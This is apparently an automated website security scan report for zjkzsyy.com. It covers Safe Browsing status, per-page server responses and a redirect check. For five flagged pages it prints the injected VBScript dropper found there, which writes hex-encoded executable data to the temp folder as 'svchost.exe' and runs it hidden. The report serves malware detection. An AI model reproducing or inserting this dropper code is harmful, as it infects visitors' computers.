Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zjkzsyy.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.zjkzsyy.com/ | HTTP/1.1 200 OK Connection: close Date: Sat, 17 Jan 2015 21:26:48 GMT Server: nginx/1.3.11 Vary: Accept-Encoding Content-Location: http://www.zjkzsyy.com/index.html Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zjkzsyy.com/index.html | 200 OK Content-Length: 191291 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zjkzsyy.com/skin/js/Leftsy.js | 200 OK Content-Length: 1956 Content-Type: application/x-javascript | clean |
http://www.zjkzsyy.com/swt/js/jquery-1.7.1.min.js | 200 OK Content-Length: 93870 Content-Type: application/x-javascript | clean |
http://www.zjkzsyy.com/swt/js/jquery-ui-datepicker.js | 200 OK Content-Length: 51694 Content-Type: application/x-javascript | clean |
http://www.zjkzsyy.com/swt/js/lyas.js | 200 OK Content-Length: 3031 Content-Type: application/x-javascript | clean |
http://www.zjkzsyy.com/skin/js/MSClass.js | 200 OK Content-Length: 16169 Content-Type: application/x-javascript | clean |
http://www.zjkzsyy.com/skin/js/foot.js | 200 OK Content-Length: 3218 Content-Type: application/x-javascript | clean |
http://www.zjkzsyy.com/skin/js/bfoot.js | 200 OK Content-Length: 25287 Content-Type: application/x-javascript | clean |
http://www.zjkzsyy.com/xgnza/zx/ | HTTP/1.1 200 OK Connection: close Date: Sat, 17 Jan 2015 21:27:11 GMT Server: nginx/1.3.11 Vary: Accept-Encoding Content-Location: http://www.zjkzsyy.com/xgnza/zx/index.html Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zjkzsyy.com/xgnza/zx/index.html | 200 OK Content-Length: 157952 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zjkzsyy.com/skin/js/jquery.js | 200 OK Content-Length: 55805 Content-Type: application/x-javascript | clean |
http://www.zjkzsyy.com/skin/js/zt.js | 200 OK Content-Length: 1433 Content-Type: application/x-javascript | clean |
http://www.zjkzsyy.com/skin/js/right_zt.js | 200 OK Content-Length: 2033 Content-Type: application/x-javascript | clean |
http://www.zjkzsyy.com/xgnza/yw/ | HTTP/1.1 200 OK Connection: close Date: Sat, 17 Jan 2015 21:27:21 GMT Server: nginx/1.3.11 Vary: Accept-Encoding Content-Location: http://www.zjkzsyy.com/xgnza/yw/index.html Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zjkzsyy.com/xgnza/yw/index.html | 200 OK Content-Length: 157838 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zjkzsyy.com/qlxjb/qlxy/ | HTTP/1.1 200 OK Connection: close Date: Sat, 17 Jan 2015 21:27:26 GMT Server: nginx/1.3.11 Vary: Accept-Encoding Content-Location: http://www.zjkzsyy.com/qlxjb/qlxy/index.html Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zjkzsyy.com/qlxjb/qlxy/index.html | 200 OK Content-Length: 158218 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zjkzsyy.com/wczx/bpgc/ | HTTP/1.1 200 OK Connection: close Date: Sat, 17 Jan 2015 21:27:32 GMT Server: nginx/1.3.11 Vary: Accept-Encoding Content-Location: http://www.zjkzsyy.com/wczx/bpgc/index.html Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zjkzsyy.com/wczx/bpgc/index.html | 200 OK Content-Length: 158155 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zjkzsyy.com
Result:
GET / HTTP/1.1
Host: zjkzsyy.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: zjkzsyy.com
Referer: http://www.google.com/search?q=zjkzsyy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zjkzsyy.com
Referer: http://www.google.com/search?q=zjkzsyy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.